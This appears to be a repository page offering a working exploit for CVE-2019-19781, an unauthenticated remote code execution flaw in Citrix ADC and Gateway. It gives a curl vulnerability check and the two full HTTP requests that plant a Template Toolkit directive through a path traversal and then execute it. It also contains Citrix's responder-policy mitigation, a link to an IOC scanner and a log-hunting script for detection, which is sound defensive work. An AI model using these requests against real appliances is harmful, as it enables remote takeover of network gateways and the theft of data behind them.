Stars: 157 | Rank: 232,921 (Top 5 %) | Language: Python | Created over 4 years ago | Updated over 3 years ago


Repository Details

CVE-2019-19781 - Remote Code Execution on Citrix ADC (NetScaler) exploit

CVE-2019-19781

Remote Code Execution (RCE) in Citrix Application Delivery Controller and Citrix Gateway

A vulnerability has been identified in Citrix Application Delivery Controller (ADC), formerly known as NetScaler ADC, and Citrix Gateway, formerly known as NetScaler Gateway, that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.

EDIT: FireEye has published an Indicator of Compromise scanner for CVE-2019-19781, useful for appliances that were exposed before being mitigated -> https://github.com/fireeye/ioc-scanner-CVE-2019-19781/

Products affected:

  • Citrix ADC and Citrix Gateway version 13.0 all supported builds
  • Citrix ADC and NetScaler Gateway version 12.1 all supported builds
  • Citrix ADC and NetScaler Gateway version 12.0 all supported builds
  • Citrix ADC and NetScaler Gateway version 11.1 all supported builds
  • Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds


Check if vulnerable

The appliance refuses unauthenticated requests to /vpns/, but the check is done on the raw request target while Apache normalises it, so /vpn/../vpns/ slips past the check and reaches the /vpns/ directory handler. A vulnerable host therefore answers with Apache's own 403 page ("You don't have permission to access /vpns/"); a host with the responder mitigation below answers with a bare 403 and no such body. The --path-as-is flag is required, otherwise curl collapses /vpn/../ itself and never sends the traversal.

TARGET=your_ip
curl -vk --path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep "You don't have permission to access /vpns/" >/dev/null && echo "VULNERABLE: $TARGET" || echo "MITIGATED: $TARGET"

Vulnerable Perl scripts (reachable without authentication through the traversal)

POST /vpn/../vpns/portal/scripts/newbm.pl
POST /vpn/../vpns/portal/scripts/rmbm.pl
GET /vpn/../vpns/portal/scripts/picktheme.pl

Exploit

Only two requests are needed to exploit this vulnerability, without any authentication. The first one abuses newbm.pl: the script saves a bookmark into a per-user XML file whose path is built from the NSC_USER header, so a traversal in that header drops the file into the portal templates directory, and the bookmark title is written unescaped, so it can carry Template Toolkit directives. The second request asks the portal to render that template, which evaluates the directive (here `uname -a`) and returns its output in the response.

First request:

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close
Content-Length: 109

url=http://example.com&title=[%t=template.new({'BLOCK'='print `uname -a`'})%][% t %]&desc=test&UI_inuse=RfWeb

(Content-Length must match the body exactly: the body above is 109 bytes. NSC_NONCE can be any value but must be present.)

Second request (the .xml name must be the last path component of the NSC_USER value used in the first request; if the appliance refuses the direct /vpns/ path for an unauthenticated client, prefix it with the same /vpn/../ traversal):

GET /vpns/portal/randomletter.xml HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close


Detailed analysis (English):

Security advisory: Citrix CTX267027

Mitigation (a responder policy, not a real patch)

The commands below are the Citrix workaround. They enable the Responder feature, define an action that answers with a bare 403, and bind a policy globally at priority 1 as a request override so it is evaluated before anything else. The policy fires when the URL-decoded request URL contains "/vpns/" and either the client has no SSL VPN session or the URL still contains "/../"; decoding in text mode means percent-encoded variants such as %2e%2e are matched as well. Because it only filters incoming requests, it does nothing about templates an attacker has already written, so an appliance that was exposed before the policy was applied should still be checked with the IOC scanner linked above and upgraded to a fixed build.

enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config
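The responder policy's predicate, applied offline to web-server access logs instead of live traffic, as an added example (not code from the original repository). It URL-decodes each request target and flags those containing both "/vpns/" and "/../", then names which of the three Perl scripts or which template fetch a flagged line corresponds to, and lists source IPs that completed both exploit stages. The log lines are constructed for this example, the combined log format and the /var/log/httpaccess.log path are assumptions, and the function names are mine.

```python
#!/usr/bin/env python3
"""Hunt for CVE-2019-19781 exploitation in Apache access logs (added example).

Applies the responder policy's predicate to a log file: URL-decode each
request target and flag those containing both "/vpns/" and "/../".
Assumption: the appliance's Apache writes "combined" format lines to
/var/log/httpaccess.log; adjust the path/regex to your collection.
"""
import re
from urllib.parse import unquote

# Apache combined format: ip ident user [ts] "METHOD target PROTO" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# The three Perl scripts listed above, reachable through the traversal.
KNOWN_SCRIPTS = ("newbm.pl", "rmbm.pl", "picktheme.pl")

# Constructed sample lines (not real traffic): one source completing both
# exploit stages, one using percent-encoded dots, and two benign requests.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Jan/2020:04:12:01 +0000] "GET /vpn/../vpns/ HTTP/1.1" 403 305 "-" "curl/7.64.1"
203.0.113.10 - - [11/Jan/2020:04:12:05 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 34 "-" "python-requests/2.22.0"
203.0.113.10 - - [11/Jan/2020:04:12:07 +0000] "GET /vpn/../vpns/portal/randomletter.xml HTTP/1.1" 200 812 "-" "python-requests/2.22.0"
198.51.100.7 - - [11/Jan/2020:04:13:00 +0000] "GET /vpn/%2e%2e/vpns/portal/scripts/picktheme.pl HTTP/1.1" 200 120 "-" "Mozilla/5.0"
192.0.2.44 - - [11/Jan/2020:04:14:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.44 - - [11/Jan/2020:04:14:02 +0000] "GET /logon/LogonPoint/index.html HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""


def is_traversal_to_vpns(target: str) -> bool:
    """Same test as the responder policy: the decoded target contains '/vpns/' and '/../'.
    unquote() turns %2e%2e into .. and %2f into /, so encoded variants match too."""
    decoded = unquote(target)
    return "/vpns/" in decoded and "/../" in decoded


def classify_stage(target: str) -> str:
    """Name the exploit stage a flagged request corresponds to."""
    path = unquote(target).split("?", 1)[0]
    for script in KNOWN_SCRIPTS:
        if path.endswith("/vpns/portal/scripts/" + script):
            return script
    if "/vpns/portal/" in path and path.endswith(".xml"):
        return "template fetch"      # second stage: rendering the planted template
    return "probe"                   # traversal without a known target, e.g. a scanner


def analyse(log_text: str) -> list:
    """Return one record per flagged request, in log order."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_traversal_to_vpns(m["target"]):
            continue
        hits.append({
            "ip": m["ip"], "ts": m["ts"], "method": m["method"],
            "target": m["target"], "status": int(m["status"]),
            "stage": classify_stage(m["target"]),
        })
    return hits


def likely_exploited(hits: list) -> set:
    """Sources that both wrote through a bookmark script (newbm.pl/rmbm.pl) and
    fetched a template with HTTP 200: the two-request pattern, not a lone probe."""
    wrote, fetched = set(), set()
    for h in hits:
        if h["stage"] in ("newbm.pl", "rmbm.pl") and h["status"] == 200:
            wrote.add(h["ip"])
        elif h["stage"] == "template fetch" and h["status"] == 200:
            fetched.add(h["ip"])
    return wrote & fetched


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    hits = analyse(text)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]} {h["method"]} {h["target"]} -> {h["status"]} [{h["stage"]}]')
    print("likely exploited by:", sorted(likely_exploited(hits)))
```

A direct GET of /vpns/portal/<name>.xml with no /vpn/../ prefix, as in the second request above, does not match this predicate; that half of the responder policy relies on session state (CLIENT.SSLVPN.IS_SSLVPN) which an access log does not carry, so review such fetches together with any first-stage write from the same source.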

More Repositories (same author)

1. BackupOperatorToDA (C++, 378 stars): From an account that is a member of the Backup Operators group to Domain Admin without RDP or WinRM on the Domain Controller
2. Padding-oracle-attack (Python, 316 stars): Padding oracle attack against PKCS7
3. Spring-Boot-Actuator-Exploit (Java, 316 stars): Spring Boot Actuator (jolokia) XXE/RCE
4. poodle-PoC (Python, 243 stars): POODLE (Padding Oracle On Downgraded Legacy Encryption) attack, CVE-2014-3566
5. CVE-2019-0192 (Python, 212 stars): RCE on Apache Solr using deserialization of untrusted data via jmx.serviceUrl
6. ByP-SOP (HTML, 194 stars): Bypass the Same-Origin Policy with DNS rebinding to retrieve local server files
7. CVE-2019-5418 (192 stars): File Content Disclosure on Ruby on Rails
8. CVE-2019-7238 (Python, 151 stars): PoC of CVE-2019-7238, Nexus Repository Manager 3 Remote Code Execution
9. Rails-doubletap-RCE (Ruby, 134 stars): RCE on Rails 5.2.2 using a path traversal (CVE-2019-5418) and a deserialization of Ruby objects (CVE-2019-5420)
10. discord-e2e-encryption (JavaScript, 86 stars): Tampermonkey script that encrypts and decrypts your messages on Discord
11. heartbleed-PoC (Python, 77 stars): Heartbleed exploit to retrieve sensitive information, CVE-2014-0160
12. BEAST-PoC (Python, 67 stars): Proof of concept of the BEAST attack against SSL/TLS, CVE-2011-3389
13. CVE-2018-17246 (59 stars): Kibana LFI < 6.4.3 & 5.6.13
14. CVE-2019-7609 (51 stars): RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizer
15. CVE-2019-9580 (HTML, 32 stars): StackStorm: exploiting CORS misconfiguration (null origin) to gain RCE
16. CVE-2019-3799 (32 stars): Spring Cloud Config Server: Directory Traversal < 2.1.2, 2.0.4, 1.4.6
17. astudiaeth (TeX, 28 stars): Master CSI
18. CRIME-poc (Python, 28 stars): CRIME attack PoC, a compression oracle attack, CVE-2012-4929
19. CVE-2018-16341 (Python, 25 stars): Nuxeo Remote Code Execution without authentication using Server-Side Template Injection
20. ntlmrelayx-prettyloot (Python, 22 stars): Convert the loot directory of ntlmrelayx into an enum4linux-like output
21. CVE-2018-19276 (Python, 17 stars): OpenMRS Insecure Object Deserialization RCE
22. HallOfFame-Root-me.org (Python, 15 stars): Root-me Hall of Fame dashboard
23. DllInjectExec (C++, 14 stars): DLL injection for an executable file
24. Slanger-RCE (Python, 12 stars): RCE in Slanger using deserialization of Ruby objects
25. CVE-2018-3760 (9 stars): Rails Asset Pipeline Directory Traversal Vulnerability
26. ropycat (C#, 9 stars): Scripts that let you copy/paste text into another Windows process to bypass the Citrix copy/paste limitation
27. CVE-2019-9978 (9 stars): RCE on a WordPress plugin: Social Warfare < 3.5.3
28. discourse-cookie-token-domain (Ruby, 8 stars): Allows setting up a cookie token to authenticate the user
29. CVE-2018-11686 (Python, 7 stars): FlexPaper PHP Publish Service RCE <= 2.3.6
30. ShareP0wn (Python, 7 stars)
31. YTC-ID (HTML, 5 stars): Get the YouTube channel ID
32. DllInjectService (C++, 5 stars): DLL ready to be injected into a service
33. copper-jekyll-theme (CSS, 5 stars): Copper Jekyll theme, simple and useful
34. docker_dashboard (Python, 4 stars)
35. impacket-cme (Python, 2 stars)
36. swindle (PHP, 2 stars): Swindle is a project for YouTube Network
37. AChat-Reverse-TCP-Exploit (Python, 2 stars): Tested on AChat 0.150 Beta 7, Windows 7/8/10 x86/x64
38. Ipsum (JavaScript, 1 star): Small app for YouTube Network: a free submission form for YouTube channels that want to join your network, built with AngularJS
39. Pyrox (PHP, 1 star): For YouTube Network, using the public YouTube API v3